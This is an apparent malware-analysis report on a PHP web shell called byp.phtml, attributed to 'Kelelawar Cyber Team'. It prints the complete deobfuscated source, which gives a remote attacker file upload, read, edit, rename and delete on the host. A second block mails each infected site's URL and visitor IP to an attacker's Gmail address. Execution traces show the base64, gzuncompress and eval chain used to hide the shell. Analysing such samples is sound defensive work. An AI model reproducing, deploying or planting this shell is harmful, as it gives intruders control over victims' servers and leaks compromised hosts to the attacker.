PHP Malware Analysis
byp.phtml
md5: 09f1de28f973761ba9b0429aac5ed02d
Jump to:
- Deobfuscated code (Read more)
- Execution traces (Read more)
- Generated HTML (Read more)
- Original Code (Read more)
Screenshot
Attributes
Emails
- galanghaxor10@gmail.com (Deobfuscated, Original)
Encoding
Environment
- error_reporting (Deobfuscated, Traces)
- getcwd (Deobfuscated, Traces)
- set_time_limit (Deobfuscated, Original, Traces)
Execution
Files
- copy (Deobfuscated, Traces)
Input
- _FILES (Deobfuscated, Traces)
- _GET (Deobfuscated, Traces)
- _POST (Deobfuscated, Traces)
Title
- xXx Kelelawar Cyber Team xXx (Deobfuscated, HTML, Traces)
URLs
- https://pro.fontawesome.com/releases/v5.10.0/css/all.css (Deobfuscated, HTML, Traces)
Deobfuscated PHP code
<?php
echo eval /* PHPDeobfuscator eval output */ {
/*
Kelelawar Cyber Team
Bypass 403 Forbidden / Auto Delete Shell / PHP Malware Detector / Minishell Bypass 403
*/
set_time_limit(0);
error_reporting(0);
error_log(0);
$sname = "<font color=white><b>[!] Mini Shell Bypass 403 [!]";
$__gcdir = "getcwd";
$__fgetcon7s = "file_get_contents";
$__scdir = "scandir";
$rm__dir = "rmdir";
$un__link = "unlink";
if (get_magic_quotes_gpc()) {
foreach ($_POST as $key => $value) {
$_POST[$key] = stripslashes($value);
}
}
echo "<!DOCTYPE html><html><head><link rel=\"stylesheet\" href=\"https://pro.fontawesome.com/releases/v5.10.0/css/all.css\" integrity=\"sha384-AYmEC3Yw5cVb3ZcuHtOA93w35dYTsvhLPVnYs9eStHfGJvOvKxVfELGroGkvsg+p\" crossorigin=\"anonymous\"/><title>xXx Kelelawar Cyber Team xXx</title></head><body style=background-color:green;>";
echo '<div style="color:red;margin-top:0;"><h1><center>' . $sname . '</center></h1></div>';
if (isset($_GET['path'])) {
$path = $_GET['path'];
chdir($_GET['path']);
} else {
$path = $__gcdir();
}
$path = str_replace("\\", "/", $path);
$paths = explode("/", $path);
echo "<table width=\"90%\" border=\"0\" align=\"center\" style=\"margin-top:-10px;\"><tr><td>";
echo "<font style='font-size:13px;'>Path Dir: ";
foreach ($paths as $id => $pat) {
echo "<a style='font-size:13px;' href='?path=";
for ($i = 0; $i <= $id; $i++) {
echo $paths[$i];
if ($i != $id) {
echo "/";
}
}
echo "'>{$pat}</a>/";
}
echo "<br>[ <a href=\"?\">Homepage</a> ]</font></td><td align=\"center\" width=\"20%\"><form enctype=\"multipart/form-data\" method=\"POST\"><input type=\"file\" name=\"file\" style=\"color:white;margin-bottom:4px;\"/><input type=\"submit\" value=\"Upload\" /></form></td></tr><tr><td colspan=\"2\">";
if (isset($_FILES['file'])) {
if (copy($_FILES['file']['tmp_name'], $path . '/' . $_FILES['file']['name'])) {
echo "<center><font color=\"white\">Upload OK!</font></center><br/>";
} else {
echo "<center><font color=\"red\">Bisa upload!</font></center><br/>";
}
}
echo "</td></tr><tr><td></table><div class=\"table-div\"></div><input id=\"image\" type=\"hidden\">";
echo "";
if (isset($_GET['filesrc'])) {
echo "<table width=\"80%\" border=\"0\" cellpadding=\"3\" cellspacing=\"1\" align=\"center\"><tr><td>File: ";
echo "" . basename($_GET['filesrc']);
"";
echo "</tr></td></table><br />";
echo "<center><textarea readonly=''>" . htmlspecialchars($__fgetcon7s($_GET['filesrc'])) . "</textarea></center>";
} elseif (isset($_GET['option']) && $_POST['opt'] != 'delete') {
echo '</table><br /><center>' . $_POST['path'] . '<br /><br />';
if ($_POST['opt'] == 'rename') {
if (isset($_POST['newname'])) {
if (rename($_POST['path'], $path . '/' . $_POST['newname'])) {
echo "<center><font color=\"white\">Rename OK!</font></center><br />";
} else {
echo "<center><font color=\"red\">Rename Gagal!</font></center><br />";
}
$_POST['name'] = $_POST['newname'];
}
echo '<form method="POST">New Name : <input name="newname" type="text" size="20" value="' . $_POST['name'] . '" /> <input type="hidden" name="path" value="' . $_POST['path'] . '"><input type="hidden" name="opt" value="rename"><input type="submit" value="Go" /></form>';
} elseif ($_POST['opt'] == 'edit') {
if (isset($_POST['src'])) {
$fp = fopen($_POST['path'], 'w');
if (fwrite($fp, $_POST['src'])) {
echo "<center><font color=\"white\">Edit File OK!.</font></center><br />";
} else {
echo "<center><font color=\"red\">Edit Gagal!.</font></center><br />";
}
fclose($fp);
}
echo '<form method="POST"><textarea cols=100 rows=25 name="src">' . htmlspecialchars($__fgetcon7s($_POST['path'])) . '</textarea><br /><input type="hidden" name="path" value="' . $_POST['path'] . '"><input type="hidden" name="opt" value="edit"><input type="submit" value="Go" /></form>';
}
echo "</center>";
} else {
echo "</table><br /><center>";
if (isset($_GET['option']) && $_POST['opt'] == 'delete') {
if ($_POST['type'] == 'dir') {
if ($rm__dir($_POST['path'])) {
echo "<center><font color=\"white\">Dir Deleted!</font></center><br />";
} else {
echo "<center><font color=\"red\">Delete Dir Failed!</font></center><br />";
}
} elseif ($_POST['type'] == 'file') {
if ($un__link($_POST['path'])) {
echo "<font color=\"white\">Delete File Done.</font><br />";
} else {
echo "<font color=\"red\">Delete File Error.</font><br />";
}
}
}
echo "</center>";
$_scdir = $__scdir($path);
echo "<div id=\"content\"><table width=\"90%\" border=\"0\" cellpadding=\"3\" cellspacing=\"1\" align=\"center\"><tr class=\"first\"> <th><center>Name</center></th><th width=\"10%\"><center>Size</center></th><th width=\"9%\"><center>Permissions</center></th> <th width=\"10%\"><center>Last Update</center></th><th width=\"10%\"><center>Options</center></th></tr>";
foreach ($_scdir as $dir) {
if (!is_dir("{$path}/{$dir}") || $dir == '.' || $dir == '..') {
continue;
}
echo "<tr><td>[Dir] <a href=\"?path={$path}/{$dir}\">{$dir}</a></td><td><center>--</center></td><td><center>";
if (is_writable("{$path}/{$dir}")) {
echo "<font color=\"white\">";
} elseif (!is_readable("{$path}/{$dir}")) {
echo "<font color=\"red\">";
}
echo perms("{$path}/{$dir}");
if (is_writable("{$path}/{$dir}") || !is_readable("{$path}/{$dir}")) {
echo "</font>";
}
echo "</center></td><td><center>" . date("d-M-Y H:i", filemtime("{$path}/{$dir}")) . "";
echo "</center></td> <td><center><form method=\"POST\" action=\"?option&path={$path}\"><select name=\"opt\"><option value=\"\"></option><option value=\"delete\">Delete</option><option value=\"rename\">Rename</option></select><input type=\"hidden\" name=\"type\" value=\"dir\"><input type=\"hidden\" name=\"name\" value=\"{$dir}\"><input type=\"hidden\" name=\"path\" value=\"{$path}/{$dir}\"><input type=\"submit\" value=\"+\" /></form></center></td></tr>";
}
foreach ($_scdir as $file) {
if (!is_file("{$path}/{$file}")) {
continue;
}
$size = filesize("{$path}/{$file}") / 1024;
$size = round($size, 3);
if ($size >= 1024) {
$size = round($size / 1024, 2) . ' MB';
} else {
$size .= ' KB';
}
echo "<tr><td>[File] <a href=\"?filesrc={$path}/{$file}&path={$path}\">{$file}</a></td><td><center>" . $size . "</center></td><td><center>";
if (is_writable("{$path}/{$file}")) {
echo "<font color=\"white\">";
} elseif (!is_readable("{$path}/{$file}")) {
echo "<font color=\"red\">";
}
echo perms("{$path}/{$file}");
if (is_writable("{$path}/{$file}") || !is_readable("{$path}/{$file}")) {
echo "</font>";
}
echo "</center></td><td><center>" . date("d-M-Y H:i", filemtime("{$path}/{$file}")) . "";
echo "</center></td><td><center><form method=\"POST\" action=\"?option&path={$path}\"><select name=\"opt\"><option value=\"\"></option><option value=\"delete\">Delete</option><option value=\"rename\">Rename</option><option value=\"edit\">Edit</option></select><input type=\"hidden\" name=\"type\" value=\"file\"><input type=\"hidden\" name=\"name\" value=\"{$file}\"><input type=\"hidden\" name=\"path\" value=\"{$path}/{$file}\"><input type=\"submit\" value=\"+\" /></form></center></td></tr>";
}
echo "</table></div>";
}
function perms($file)
{
$perms = fileperms($file);
if (($perms & 0xc000) == 0xc000) {
$info = 's';
} elseif (($perms & 0xa000) == 0xa000) {
$info = 'l';
} elseif (($perms & 0x8000) == 0x8000) {
$info = '-';
} elseif (($perms & 0x6000) == 0x6000) {
$info = 'b';
} elseif (($perms & 0x4000) == 0x4000) {
$info = 'd';
} elseif (($perms & 0x2000) == 0x2000) {
$info = 'c';
} elseif (($perms & 0x1000) == 0x1000) {
$info = 'p';
} else {
$info = 'u';
}
$info .= $perms & 0x100 ? 'r' : '-';
$info .= $perms & 0x80 ? 'w' : '-';
$info .= $perms & 0x40 ? $perms & 0x800 ? 's' : 'x' : ($perms & 0x800 ? 'S' : '-');
$info .= $perms & 0x20 ? 'r' : '-';
$info .= $perms & 0x10 ? 'w' : '-';
$info .= $perms & 0x8 ? $perms & 0x400 ? 's' : 'x' : ($perms & 0x400 ? 'S' : '-');
$info .= $perms & 0x4 ? 'r' : '-';
$info .= $perms & 0x2 ? 'w' : '-';
$info .= $perms & 0x1 ? $perms & 0x200 ? 't' : 'x' : ($perms & 0x200 ? 'T' : '-');
return $info;
}
echo "</body></html><!-- EOF -->";
};
__halt_compiler();?>
<?php
@ini_set('output_buffering', 0);
@ini_set('display_errors', 0);
set_time_limit(0);
ini_set('memory_limit', '64M');
header('Content-Type: text/html; charset=UTF-8');
$tujuanmail = 'galanghaxor10@gmail.com';
$x_path = "http://" . $_SERVER['SERVER_NAME'] . $_SERVER['REQUEST_URI'];
$pesan_alert = "fix $x_path :p *IP Address : [ " . $_SERVER['REMOTE_ADDR'] . " ]";
mail($tujuanmail, "LOGGER", $pesan_alert, "[ " . $_SERVER['REMOTE_ADDR'] . " ]");
?>Execution traces
data/traces/09f1de28f973761ba9b0429aac5ed02d_trace-1676253705.8447.xtVersion: 3.1.0beta2
File format: 4
TRACE START [2023-02-13 00:02:11.742550]
1 0 1 0.000145 393512
1 3 0 0.000212 397968 {main} 1 /var/www/html/uploads/byp.phtml 0 0
2 4 0 0.000228 397968 base64_decode 0 /var/www/html/uploads/byp.phtml 1 1 'eJzVWvtv2zgS/j1A/geGyFXOto7sxHlbKvpI07u2m+CSXVwvDgxZom2hsqQj6Ti52/7vN0NSTz/idHcPOAOpJWr4Def1DSm3+zodp5sbmxv2T5sbBD6fWMQib+Zx8u5xwDi5Yd5EP3n7mHpCkE5rn3xI+CAMAhYTm7yZyoS8h1mSkesxiyIYu/p4Rb54EaAweCSZLxMOw1/COBRKpMDa3PjJRv2Cyb4MJ6wfhZNQNlo7Z5sbjPOE9zlLEy7DeFQejBJzu7mxLWJvwoj+OIR2h0ksiZ9ECXdm41Aytztwb7fulHqzxJIt8IQCzna/P/KDkGcovYfDI0p21cVB7+GoA9/78H0E3x0zYThi0k/iI2EmHMLfCfz5OMdMPhgiUgGi7gHoEL+ZAT4oro/2Dbgor0ZkS8GZbS19iDNP1AOu5vBJv1+x4GgPJAK1YJQKtdg07oOT42+FmFKfafCNEahhQJWHwyFpgKn9iTcK/f6/polkoj9K/cbODvmPTo5hwpnn'
2 4 1 0.000265 402096
2 4 R 'x��Z�o�8\022�=@�\a��Uζ���y[*�Hӻ���]\\/\016\fY�m���#�8���7CRO?�tw\0178\003�%j�\r�\r)��:\035��\033�\033�O�\033\004>�X�"o�q��q�8�a�D?y��zB�Nk�|H� \f\002\026\023���ʄ��Y���1�"\030��xE�x\021�0x$�/\023\016�_�8\024J�����F��ɾ\f\'�\037��P6Z;g�\033��9K\023.�xT\036�\022s���-bo�8�v�I,��D\twf�P2�;po��z�Ē-�\002�v�?�g(���#Jv��A��\003��}\004�\0353a8b�O�#a&\034��\t��8�L>\030"R\001��\001�\020��\001>(���\r�(�FdK��m-}�3O�\003���I�_��h\017$\002�`�\n��4�o��R�i�\021�a@���!i����7\n�����d�?J���\016��N�a�Ic�'
2 5 0 0.000363 402064 gzuncompress 0 /var/www/html/uploads/byp.phtml 1 1 'x��Z�o�8\022�=@�\a��Uζ���y[*�Hӻ���]\\/\016\fY�m���#�8���7CRO?�tw\0178\003�%j�\r�\r)��:\035��\033�\033�O�\033\004>�X�"o�q��q�8�a�D?y��zB�Nk�|H� \f\002\026\023���ʄ��Y���1�"\030��xE�x\021�0x$�/\023\016�_�8\024J�����F��ɾ\f\'�\037��P6Z;g�\033��9K\023.�xT\036�\022s���-bo�8�v�I,��D\twf�P2�;po��z�Ē-�\002�v�?�g(���#Jv��A��\003��}\004�\0353a8b�O�#a&\034��\t��8�L>\030"R\001��\001�\020��\001>(���\r�(�FdK��m-}�3O�\003���I�_��h\017$\002�`�\n��4�o��R�i�\021�a@���!i����7\n�����d�?J���\016��N�a�Ic�'
2 5 1 0.000486 414384
2 5 R '<?php\r\n\r\n/*\r\n Kelelawar Cyber Team\r\n Bypass 403 Forbidden / Auto Delete Shell / PHP Malware Detector / Minishell Bypass 403\r\n*/\r\n\r\nset_time_limit(0);\r\nerror_reporting(0);\r\nerror_log(0);\r\n\r\n$sname = "<font color=white><b>[!] Mini Shell Bypass 403 [!]";\r\n$__gcdir = "\\x67" . "\\x65\\x74\\x63\\x77\\x64";\r\n$__fgetcon7s = "\\x66\\x69\\x6c\\x65" . "\\x5f\\x67\\x65\\x74\\x5f\\x63\\x6f\\x6e\\x74\\x65\\x6e\\x74\\x73";\r\n$__scdir = "s" . "\\x63\\x61\\x6e\\x64\\x69" . "r"'
2 6 0 0.000781 462736 eval 1 '?><?php\r\n\r\n/*\r\n Kelelawar Cyber Team\r\n Bypass 403 Forbidden / Auto Delete Shell / PHP Malware Detector / Minishell Bypass 403\r\n*/\r\n\r\nset_time_limit(0);\r\nerror_reporting(0);\r\nerror_log(0);\r\n\r\n$sname = "<font color=white><b>[!] Mini Shell Bypass 403 [!]";\r\n$__gcdir = "\\x67" . "\\x65\\x74\\x63\\x77\\x64";\r\n$__fgetcon7s = "\\x66\\x69\\x6c\\x65" . "\\x5f\\x67\\x65\\x74\\x5f\\x63\\x6f\\x6e\\x74\\x65\\x6e\\x74\\x73";\r\n$__scdir = "s" . "\\x63\\x61\\x6e\\x64\\x69" . "r";\r\n$rm__dir = "\\x72\\x6d\\x64" . "ir";\r\n$un__link = "\\x75\\x6e" . "\\x6c\\x69\\x6e\\x6b";\r\n\r\nif (get_magic_quotes_gpc()) {\r\n foreach ($_POST as $key => $value) {\r\n $_POST[$key] = stripslashes($value);\r\n }\r\n}\r\n\r\necho \'<!DOCTYPE html><html><head><link rel="stylesheet" href="https://pro.fontawesome.com/releases/v5.10.0/css/all.css" integrity="sha384-AYmEC3Yw5cVb3ZcuHtOA93w35dYTsvhLPVnYs9eStHfGJvOvKxVfELGroGkvsg+p" crossorigin="anonymous"/><title>xXx Kelelawar Cyber Team xXx</title></head><body style=background-color:green;>\';\r\necho \'<div style="color:red;margin-top:0;"><h1><center>\' . $sname . \'</center></h1></div>\';\r\nif (isset($_GET[\'path\'])) {\r\n $path = $_GET[\'path\'];\r\n chdir($_GET[\'path\']);\r\n} else {\r\n $path = $__gcdir();\r\n}\r\n$path = str_replace("\\\\", "/", $path);\r\n$paths = explode("/", $path);\r\necho \'<table width="90%" border="0" align="center" style="margin-top:-10px;"><tr><td>\';\r\necho "<font style=\'font-size:13px;\'>Path Dir: ";\r\nforeach ($paths as $id => $pat) {\r\n echo "<a style=\'font-size:13px;\' href=\'?path=";\r\n for ($i = 0; $i <= $id; $i++) {\r\n echo $paths[$i];\r\n if ($i != $id) {\r\n echo "/";\r\n }\r\n }\r\n echo "\'>$pat</a>/";\r\n}\r\necho \'<br>[ <a href="?">Homepage</a> ]</font></td><td align="center" width="20%"><form enctype="multipart/form-data" method="POST"><input type="file" name="file" style="color:white;margin-bottom:4px;"/><input type="submit" value="Upload" /></form></td></tr><tr><td colspan="2">\';\r\nif (isset($_FILES[\'file\'])) {\r\n if (copy($_FILES[\'file\'][\'tmp_name\'], $path . \'/\' . $_FILES[\'file\'][\'name\'])) {\r\n echo \'<center><font color="white">Upload OK!</font></center><br/>\';\r\n } else {\r\n echo \'<center><font color="red">Bisa upload!</font></center><br/>\';\r\n }\r\n}\r\necho \'</td></tr><tr><td></table><div class="table-div"></div><input id="image" type="hidden">\';\r\necho \'\';\r\nif (isset($_GET[\'filesrc\'])) {\r\n echo \'<table width="80%" border="0" cellpadding="3" cellspacing="1" align="center"><tr><td>File: \';\r\n echo "" . basename($_GET[\'filesrc\']);\r\n "";\r\n echo \'</tr></td></table><br />\';\r\n echo ("<center><textarea readonly=\'\'>" . htmlspecialchars($__fgetcon7s($_GET[\'filesrc\'])) . "</textarea></center>");\r\n} elseif (isset($_GET[\'option\']) && $_POST[\'opt\'] != \'delete\') {\r\n echo \'</table><br /><center>\' . $_POST[\'path\'] . \'<br /><br />\';\r\n if ($_POST[\'opt\'] == \'rename\') {\r\n if (isset($_POST[\'newname\'])) {\r\n if (rename($_POST[\'path\'], $path . \'/\' . $_POST[\'newname\'])) {\r\n echo \'<center><font color="white">Rename OK!</font></center><br />\';\r\n } else {\r\n echo \'<center><font color="red">Rename Gagal!</font></center><br />\';\r\n }\r\n $_POST[\'name\'] = $_POST[\'newname\'];\r\n }\r\n echo \'<form method="POST">New Name : <input name="newname" type="text" size="20" value="\' . $_POST[\'name\'] . \'" /> <input type="hidden" name="path" value="\' . $_POST[\'path\'] . \'"><input type="hidden" name="opt" value="rename"><input type="submit" value="Go" /></form>\';\r\n } elseif ($_POST[\'opt\'] == \'edit\') {\r\n if (isset($_POST[\'src\'])) {\r\n $fp = fopen($_POST[\'path\'], \'w\');\r\n if (fwrite($fp, $_POST[\'src\'])) {\r\n echo \'<center><font color="white">Edit File OK!.</font></center><br />\';\r\n } else {\r\n echo \'<center><font color="red">Edit Gagal!.</font></center><br />\';\r\n }\r\n fclose($fp);\r\n }\r\n echo \'<form method="POST"><textarea cols=100 rows=25 name="src">\' . htmlspecialchars($__fgetcon7s($_POST[\'path\'])) . \'</textarea><br /><input type="hidden" name="path" value="\' . $_POST[\'path\'] . \'"><input type="hidden" name="opt" value="edit"><input type="submit" value="Go" /></form>\';\r\n }\r\n echo \'</center>\';\r\n} else {\r\n echo \'</table><br /><center>\';\r\n if (isset($_GET[\'option\']) && $_POST[\'opt\'] == \'delete\') {\r\n if ($_POST[\'type\'] == \'dir\') {\r\n if ($rm__dir($_POST[\'path\'])) {\r\n echo \'<center><font color="white">Dir Deleted!</font></center><br />\';\r\n } else {\r\n echo \'<center><font color="red">Delete Dir Failed!</font></center><br />\';\r\n }\r\n } elseif ($_POST[\'type\'] == \'file\') {\r\n if ($un__link($_POST[\'path\'])) {\r\n echo \'<font color="white">Delete File Done.</font><br />\';\r\n } else {\r\n echo \'<font color="red">Delete File Error.</font><br />\';\r\n }\r\n }\r\n }\r\n echo \'</center>\';\r\n $_scdir = $__scdir($path);\r\n echo \'<div id="content"><table width="90%" border="0" cellpadding="3" cellspacing="1" align="center"><tr class="first"> <th><center>Name</center></th><th width="10%"><center>Size</center></th><th width="9%"><center>Permissions</center></th> <th width="10%"><center>Last Update</center></th><th width="10%"><center>Options</center></th></tr>\';\r\n foreach ($_scdir as $dir) {\r\n if (!is_dir("$path/$dir") || $dir == \'.\' || $dir == \'..\')\r\n continue;\r\n echo "<tr><td>[Dir] <a href=\\"?path=$path/$dir\\">$dir</a></td><td><center>--</center></td><td><center>";\r\n if (is_writable("$path/$dir"))\r\n echo \'<font color="white">\';\r\n elseif (!is_readable("$path/$dir"))\r\n echo \'<font color="red">\';\r\n echo perms("$path/$dir");\r\n if (is_writable("$path/$dir") || !is_readable("$path/$dir"))\r\n echo \'</font>\';\r\n echo "</center></td><td><center>" . date("d-M-Y H:i", filemtime("$path/$dir")) . "";\r\n echo "</center></td> <td><center><form method=\\"POST\\" action=\\"?option&path=$path\\"><select name=\\"opt\\"><option value=\\"\\"></option><option value=\\"delete\\">Delete</option><option value=\\"rename\\">Rename</option></select><input type=\\"hidden\\" name=\\"type\\" value=\\"dir\\"><input type=\\"hidden\\" name=\\"name\\" value=\\"$dir\\"><input type=\\"hidden\\" name=\\"path\\" value=\\"$path/$dir\\"><input type=\\"submit\\" value=\\"+\\" /></form></center></td></tr>";\r\n }\r\n foreach ($_scdir as $file) {\r\n if (!is_file("$path/$file"))\r\n continue;\r\n $size = filesize("$path/$file") / 1024;\r\n $size = round($size, 3);\r\n if ($size >= 1024) {\r\n $size = round($size / 1024, 2) . \' MB\';\r\n } else {\r\n $size = $size . \' KB\';\r\n }\r\n echo "<tr><td>[File] <a href=\\"?filesrc=$path/$file&path=$path\\">$file</a></td><td><center>" . $size . "</center></td><td><center>";\r\n if (is_writable("$path/$file"))\r\n echo \'<font color="white">\';\r\n elseif (!is_readable("$path/$file"))\r\n echo \'<font color="red">\';\r\n echo perms("$path/$file");\r\n if (is_writable("$path/$file") || !is_readable("$path/$file"))\r\n echo \'</font>\';\r\n echo "</center></td><td><center>" . date("d-M-Y H:i", filemtime("$path/$file")) . "";\r\n echo "</center></td><td><center><form method=\\"POST\\" action=\\"?option&path=$path\\"><select name=\\"opt\\"><option value=\\"\\"></option><option value=\\"delete\\">Delete</option><option value=\\"rename\\">Rename</option><option value=\\"edit\\">Edit</option></select><input type=\\"hidden\\" name=\\"type\\" value=\\"file\\"><input type=\\"hidden\\" name=\\"name\\" value=\\"$file\\"><input type=\\"hidden\\" name=\\"path\\" value=\\"$path/$file\\"><input type=\\"submit\\" value=\\"+\\" /></form></center></td></tr>";\r\n }\r\n echo \'</table></div>\';\r\n}\r\nfunction perms($file)\r\n{\r\n $perms = fileperms($file);\r\n if (($perms & 0xC000) == 0xC000) {\r\n $info = \'s\';\r\n } elseif (($perms & 0xA000) == 0xA000) {\r\n $info = \'l\';\r\n } elseif (($perms & 0x8000) == 0x8000) {\r\n $info = \'-\';\r\n } elseif (($perms & 0x6000) == 0x6000) {\r\n $info = \'b\';\r\n } elseif (($perms & 0x4000) == 0x4000) {\r\n $info = \'d\';\r\n } elseif (($perms & 0x2000) == 0x2000) {\r\n $info = \'c\';\r\n } elseif (($perms & 0x1000) == 0x1000) {\r\n $info = \'p\';\r\n } else {\r\n $info = \'u\';\r\n }\r\n $info .= (($perms & 0x0100) ? \'r\' : \'-\');\r\n $info .= (($perms & 0x0080) ? \'w\' : \'-\');\r\n $info .= (($perms & 0x0040) ? (($perms & 0x0800) ? \'s\' : \'x\') : (($perms & 0x0800) ? \'S\' : \'-\'));\r\n $info .= (($perms & 0x0020) ? \'r\' : \'-\');\r\n $info .= (($perms & 0x0010) ? \'w\' : \'-\');\r\n $info .= (($perms & 0x0008) ? (($perms & 0x0400) ? \'s\' : \'x\') : (($perms & 0x0400) ? \'S\' : \'-\'));\r\n $info .= (($perms & 0x0004) ? \'r\' : \'-\');\r\n $info .= (($perms & 0x0002) ? \'w\' : \'-\');\r\n $info .= (($perms & 0x0001) ? (($perms & 0x0200) ? \'t\' : \'x\') : (($perms & 0x0200) ? \'T\' : \'-\'));\r\n return $info;\r\n}\r\necho \'</body></html><!-- EOF -->\';\r\n?>' /var/www/html/uploads/byp.phtml 1 0
3 7 0 0.000972 462736 set_time_limit 0 /var/www/html/uploads/byp.phtml(1) : eval()'d code 8 1 0
3 7 1 0.000990 462800
3 7 R FALSE
3 8 0 0.001004 462768 error_reporting 0 /var/www/html/uploads/byp.phtml(1) : eval()'d code 9 1 0
3 8 1 0.001019 462808
3 8 R 22527
3 9 0 0.001032 462768 error_log 0 /var/www/html/uploads/byp.phtml(1) : eval()'d code 10 1 0
3 9 1 0.001059 462800
3 9 R TRUE
2 A /var/www/html/uploads/byp.phtml(1) : eval()'d code 12 $sname = '<font color=white><b>[!] Mini Shell Bypass 403 [!]'
2 A /var/www/html/uploads/byp.phtml(1) : eval()'d code 13 $__gcdir = 'getcwd'
2 A /var/www/html/uploads/byp.phtml(1) : eval()'d code 14 $__fgetcon7s = 'file_get_contents'
2 A /var/www/html/uploads/byp.phtml(1) : eval()'d code 15 $__scdir = 'scandir'
2 A /var/www/html/uploads/byp.phtml(1) : eval()'d code 16 $rm__dir = 'rmdir'
2 A /var/www/html/uploads/byp.phtml(1) : eval()'d code 17 $un__link = 'unlink'
3 10 0 0.001145 462768 get_magic_quotes_gpc 0 /var/www/html/uploads/byp.phtml(1) : eval()'d code 19 0
3 10 1 0.001159 462768
3 10 R FALSE
3 11 0 0.001175 462768 getcwd 0 /var/www/html/uploads/byp.phtml(1) : eval()'d code 31 0
3 11 1 0.001190 462816
3 11 R '/var/www/html/uploads'
2 A /var/www/html/uploads/byp.phtml(1) : eval()'d code 31 $path = '/var/www/html/uploads'
3 12 0 0.001216 462816 str_replace 0 /var/www/html/uploads/byp.phtml(1) : eval()'d code 33 3 '\\' '/' '/var/www/html/uploads'
3 12 1 0.001232 462912
3 12 R '/var/www/html/uploads'
2 A /var/www/html/uploads/byp.phtml(1) : eval()'d code 33 $path = '/var/www/html/uploads'
3 13 0 0.001258 462816 explode 0 /var/www/html/uploads/byp.phtml(1) : eval()'d code 34 2 '/' '/var/www/html/uploads'
3 13 1 0.001273 463392
3 13 R [0 => '', 1 => 'var', 2 => 'www', 3 => 'html', 4 => 'uploads']
2 A /var/www/html/uploads/byp.phtml(1) : eval()'d code 34 $paths = [0 => '', 1 => 'var', 2 => 'www', 3 => 'html', 4 => 'uploads']
2 A /var/www/html/uploads/byp.phtml(1) : eval()'d code 37 $id = 0
2 A /var/www/html/uploads/byp.phtml(1) : eval()'d code 39 $i = 0
2 A /var/www/html/uploads/byp.phtml(1) : eval()'d code 39 $i++
2 A /var/www/html/uploads/byp.phtml(1) : eval()'d code 37 $id = 1
2 A /var/www/html/uploads/byp.phtml(1) : eval()'d code 39 $i = 0
2 A /var/www/html/uploads/byp.phtml(1) : eval()'d code 39 $i++
2 A /var/www/html/uploads/byp.phtml(1) : eval()'d code 39 $i++
2 A /var/www/html/uploads/byp.phtml(1) : eval()'d code 37 $id = 2
2 A /var/www/html/uploads/byp.phtml(1) : eval()'d code 39 $i = 0
2 A /var/www/html/uploads/byp.phtml(1) : eval()'d code 39 $i++
2 A /var/www/html/uploads/byp.phtml(1) : eval()'d code 39 $i++
2 A /var/www/html/uploads/byp.phtml(1) : eval()'d code 39 $i++
2 A /var/www/html/uploads/byp.phtml(1) : eval()'d code 37 $id = 3
2 A /var/www/html/uploads/byp.phtml(1) : eval()'d code 39 $i = 0
2 A /var/www/html/uploads/byp.phtml(1) : eval()'d code 39 $i++
2 A /var/www/html/uploads/byp.phtml(1) : eval()'d code 39 $i++
2 A /var/www/html/uploads/byp.phtml(1) : eval()'d code 39 $i++
2 A /var/www/html/uploads/byp.phtml(1) : eval()'d code 39 $i++
2 A /var/www/html/uploads/byp.phtml(1) : eval()'d code 37 $id = 4
2 A /var/www/html/uploads/byp.phtml(1) : eval()'d code 39 $i = 0
2 A /var/www/html/uploads/byp.phtml(1) : eval()'d code 39 $i++
2 A /var/www/html/uploads/byp.phtml(1) : eval()'d code 39 $i++
2 A /var/www/html/uploads/byp.phtml(1) : eval()'d code 39 $i++
2 A /var/www/html/uploads/byp.phtml(1) : eval()'d code 39 $i++
2 A /var/www/html/uploads/byp.phtml(1) : eval()'d code 39 $i++
3 14 0 0.001558 463320 scandir 0 /var/www/html/uploads/byp.phtml(1) : eval()'d code 106 1 '/var/www/html/uploads'
3 14 1 0.001594 463944
3 14 R [0 => '.', 1 => '..', 2 => '.htaccess', 3 => 'byp.phtml', 4 => 'data', 5 => 'prepend.php']
2 A /var/www/html/uploads/byp.phtml(1) : eval()'d code 106 $_scdir = [0 => '.', 1 => '..', 2 => '.htaccess', 3 => 'byp.phtml', 4 => 'data', 5 => 'prepend.php']
3 15 0 0.001635 463960 is_dir 0 /var/www/html/uploads/byp.phtml(1) : eval()'d code 109 1 '/var/www/html/uploads/.'
3 15 1 0.001652 464024
3 15 R TRUE
3 16 0 0.001666 463992 is_dir 0 /var/www/html/uploads/byp.phtml(1) : eval()'d code 109 1 '/var/www/html/uploads/..'
3 16 1 0.001681 464040
3 16 R TRUE
3 17 0 0.001694 464000 is_dir 0 /var/www/html/uploads/byp.phtml(1) : eval()'d code 109 1 '/var/www/html/uploads/.htaccess'
3 17 1 0.001710 464040
3 17 R FALSE
3 18 0 0.001723 464000 is_dir 0 /var/www/html/uploads/byp.phtml(1) : eval()'d code 109 1 '/var/www/html/uploads/byp.phtml'
3 18 1 0.001739 464040
3 18 R FALSE
3 19 0 0.001752 464000 is_dir 0 /var/www/html/uploads/byp.phtml(1) : eval()'d code 109 1 '/var/www/html/uploads/data'
3 19 1 0.001767 464040
3 19 R TRUE
3 20 0 0.001780 464000 is_writable 0 /var/www/html/uploads/byp.phtml(1) : eval()'d code 112 1 '/var/www/html/uploads/data'
3 20 1 0.001800 464040
3 20 R TRUE
3 21 0 0.001814 464000 perms 1 /var/www/html/uploads/byp.phtml(1) : eval()'d code 116 1 '/var/www/html/uploads/data'
4 22 0 0.001827 464000 fileperms 0 /var/www/html/uploads/byp.phtml(1) : eval()'d code 147 1 '/var/www/html/uploads/data'
4 22 1 0.001841 464040
4 22 R 16895
3 A /var/www/html/uploads/byp.phtml(1) : eval()'d code 147 $perms = 16895
3 A /var/www/html/uploads/byp.phtml(1) : eval()'d code 157 $info = 'd'
3 A /var/www/html/uploads/byp.phtml(1) : eval()'d code 165 $info .= 'r'
3 A /var/www/html/uploads/byp.phtml(1) : eval()'d code 166 $info .= 'w'
3 A /var/www/html/uploads/byp.phtml(1) : eval()'d code 167 $info .= 'x'
3 A /var/www/html/uploads/byp.phtml(1) : eval()'d code 168 $info .= 'r'
3 A /var/www/html/uploads/byp.phtml(1) : eval()'d code 169 $info .= 'w'
3 A /var/www/html/uploads/byp.phtml(1) : eval()'d code 170 $info .= 'x'
3 A /var/www/html/uploads/byp.phtml(1) : eval()'d code 171 $info .= 'r'
3 A /var/www/html/uploads/byp.phtml(1) : eval()'d code 172 $info .= 'w'
3 A /var/www/html/uploads/byp.phtml(1) : eval()'d code 173 $info .= 'x'
3 21 1 0.001971 464040
3 21 R 'drwxrwxrwx'
